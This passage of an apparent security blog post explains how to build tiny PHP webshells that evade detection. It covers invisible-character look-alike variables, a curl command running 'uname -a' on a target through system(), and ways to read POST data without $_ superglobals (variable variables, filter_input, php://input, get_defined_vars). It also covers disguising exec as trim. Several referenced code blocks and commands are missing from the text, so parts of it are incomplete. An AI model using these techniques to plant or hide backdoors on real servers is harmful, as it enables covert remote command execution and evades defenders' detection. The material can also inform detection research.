which means that letters (uppercase and lowercase), numbers, underscores and binary characters can be used (the first one cannot be a number). Some of these non-printable characters can be invisible (invisible-characters.com), making $x variables visually (almost) the same. To trigger code execution, the same payload can be used:

$ curl -k http://targ.et/test.php -d '0=system' -d '1=uname -a'

However, if the version with extract is used:

extract($_POST);
$x($x‍);

named indexes must be used for the two $x variables (a real one and a look-alike), and the curl command would be something like:

Getting rid of $_

The common way to pass data to PHP scripts is to send them as GET or POST parameters. Passing them as custom HTTP headers is also something quite common, to avoid payloads being logged. On the server side, passed parameters are generally retrieved with superglobals $_GET or $_POST, as shown in the tiny webshells with list and extract. The following superglobals are under the user’s control, totally or partially:

• $_GET: the parameters passed by the user in the URL ;
• $_POST: the parameters passed by the user in the request body ;
• $_FILES: uploaded files, populated even if no uploaded file is expected ;
• $_COOKIE: submitted cookies ;
• $_SESSION: normally not completely under the user’s control (fortunately). It contains data related to the current user’s session ;
• $_REQUEST: merges $_GET, $_POST and $_COOKIE ;
• $_ENV: associative array that contains variables passed to the current script via the environment method. It is not completely under the user’s control, but they can still manipulate some entries, such as $_ENV['REQUEST_URI'] ;
• $GLOBALS: variables populated based on current user’s session and HTTP request being sent. It contains the variables _GET or _POST ;
• $_SERVER: similar to $_ENV, and it also contains some entries under the user’s control.

Although using superglobals is quite handy, spotting patterns like extract($_POST) or list(...) = $_POST can be done with a few regular expressions, hunting for $_ or $GLOBALS. However, PHP is a permissive language, making it possible to recreate variables based on string manipulations, with variable variables:

$x = '_'.'POST';
echo $$x['param'];

The double-dollar sign would recreate the variable named _POST, giving in the end $_POST["param"].

Warning Please note that variable variables cannot be used with PHP’s Superglobal arrays within functions or class methods. The variable $this is also a special variable that cannot be referenced dynamically. That’s what the doc says.

Another way to write it could be as follows:

$x = ${"_"."POST"}["param"];

However, we can do a bit better, by getting rid of the $ sign. This is great because the constructions $$ and ${ are a bit odd and can be spotted with regular expressions (note that the symbols can be separated by dummy comments like $/*useless*/$x).

The following lines can also be used to retrieve data sent as POST parameters:

echo filter_input(0, "param");
echo file_get_contents("php://input");
echo get_defined_vars()[array_keys(get_defined_vars())[1]]["param"];

Let’s get more into details.

The routine filter_input

As stated in the doc

filter_input — Gets a specific external variable by name and optionally filters it

filter_input(
   int $type,
   string $var_name,
   int $filter = FILTER_DEFAULT,
   array|int $options = 0
): mixed

The first argument ($type) is supposed to be one of INPUT_GET, INPUT_POST, INPUT_COOKIE, INPUT_SERVER, or INPUT_ENV. These values can, however, be translated into integers:

• INPUT_GET: 1 ;
• INPUT_POST: 0 ;
• INPUT_COOKIE: 2 ;
• INPUT_SERVER: 5 ;
• INPUT_ENV: 4 ;

The 3 does not seem to be defined.

The second argument is the same as the passed parameter, which means that filter_input(0, "param"); would extract the value of the parameter param sent through POST.

The routine file_get_contents

This routine can be used to read a data stream (e.g. file, URL), and is quite well known. The wrapper php://input is a read-only stream that allows you to read raw data from the request body (source). Using it as an argument for file_get_contents is therefore an easy way to store the POST’ed data in a variable:

$x = file_get_contents("php://input");
var_dump($x);

If the POST’ed data contains a=b&c=d, this snippet of code would print:

string(7) "a=b&c=d"

Some manipulations still need to be done to separate the parameters.

The routine get_defined_vars

As stated in the holy doc:

This function returns a multidimensional array containing a list of all defined variables, be them environment, server or user-defined variables, within the scope that get_defined_vars() is called.

I know there is a typo and that “be them environment” is wrong, but that is what is written.

Even if no POST or GET parameter is sent, the returned multidimensional array would not be empty:

Array
(
    [_GET] => Array
        (
        )

    [_POST] => Array
        (
        )

    [_COOKIE] => Array
        (
        )

    [_FILES] => Array
        (
        )

)

Therefore, having such a request curl -k https://targ.et/test.php?x=qwertz -d 'y=asdf' would give something like:

Array
(
    [_GET] => Array
        (
            [x] => qwertz
        )

    [_POST] => Array
        (
            [y] => asdf
        )

    [_COOKIE] => Array
        (
        )

    [_FILES] => Array
        (
        )

)

To access each item without the string _GET or _POST, one could use the routine array_keys, which returns the list of the keys:

print_r(array_keys(get_defined_vars()));

The result would be like:

Array
(
    [0] => _GET
    [1] => _POST
    [2] => _COOKIE
    [3] => _FILES
)

Therefore, retrieving the POST’ed data could be done as follows:

get_defined_vars()[array_keys(get_defined_vars())[1]]; //all POST'ed data
get_defined_vars()[array_keys(get_defined_vars())[1]]["param"]; //the parameter 'param'

Let’s wrap it up in a single PHP script:

In the previous snippet, we use an additional evasion technique, masquerading exec as trim. Although the function already exists (source), it can be replaced in the current script.

Let’s trigger the command execution with curl:

Not optimal because of multiline output

The five commands passed as A, B, C, D and at the beginning of the POST’ed data are indeed passed to the exec routine, and successfully lead to commands execution.

Sources:

• PHP Backdoors: Hidden With Clever Use of Extract Function